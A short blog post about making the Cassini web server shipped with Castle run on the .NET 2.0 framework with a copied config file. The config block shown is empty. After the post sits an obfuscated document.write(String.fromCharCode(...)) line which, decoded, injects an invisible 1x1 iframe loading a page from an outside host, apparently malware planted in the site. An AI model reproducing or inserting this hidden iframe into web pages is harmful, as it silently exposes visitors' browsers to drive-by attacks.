Castle

After a few weeks of wondering why the Cassini web server distributed with Castle refused to run with the 2.0 framework but today with great luck I stumbled upon the missing piece of information in Google’s cache of Castle’s FishEye data here. I just copied the contents of that config into a new config file in Cassini’s directory and now everything works beautifully.

[code]< ?xml version="1.0"?>









[/code]

I tried repeating this trick on my laptop with the config you see above but strangely enough this failed… It was only after I went back to google for the original config and placed that in Cassini’s directory that things started working on my laptop too… Maybe a slight error on my part in copying that config file yesterday or maybe it was just a gremlin…

document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

Leave a comment